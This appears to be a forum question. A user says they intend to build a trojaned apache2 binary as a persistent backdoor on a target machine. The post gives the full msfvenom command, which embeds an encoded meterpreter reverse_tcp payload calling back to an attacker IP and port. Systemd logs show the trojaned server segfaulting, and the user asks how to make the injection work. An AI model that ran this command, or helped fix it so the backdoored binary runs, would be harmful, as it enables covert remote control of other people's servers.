I've been trying to use msfvenom with the linux/x86/meterpreter/reverse_tcp
payload and an apache2 binary. My intent is to create a tainted version of apache2 to establish a persistent backdoor on the target machine. Below is the general command I've been trying
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.181.218 LPORT=4444 -f elf -e x86/shikata_ga_nai -x ./apache2 -o ./apache2_hacked
I then copy the apache2_hacked binary to the proper location and attempt to start it with service apache2 start
. This results in a seg fault.
root@kali:~# service apache2 start
Job for apache2.service failed. See 'systemctl status apache2.service' and 'journalctl -xn' for details.
root@kali:~# systemctl status apache2.service
● apache2.service - LSB: Apache2 web server
Loaded: loaded (/etc/init.d/apache2)
Active: failed (Result: exit-code) since Fri 2015-09-18 15:49:24 EDT; 3min 37s ago
Process: 3446 ExecStart=/etc/init.d/apache2 start (code=exited, status=1/FAILURE)
Sep 18 15:49:24 kali apache2[3446]: Starting web server: apache2 failed!
Sep 18 15:49:24 kali apache2[3446]: The apache2 configtest failed. ... (warning).
Sep 18 15:49:24 kali apache2[3446]: Output of config test was:
Sep 18 15:49:24 kali apache2[3446]: Segmentation fault
Sep 18 15:49:24 kali apache2[3446]: Action 'configtest' failed.
Sep 18 15:49:24 kali apache2[3446]: The Apache error log may have more information.
Sep 18 15:49:24 kali systemd[1]: apache2.service: control process exited, code=exited status=1
Sep 18 15:49:24 kali systemd[1]: Failed to start LSB: Apache2 web server.
Sep 18 15:49:24 kali systemd[1]: Unit apache2.service entered failed state.
Am I using the tool correctly? Are there any restrictions on templates I need to be aware of? Is there some special about the apache2 binary that prevents injection attempts like this?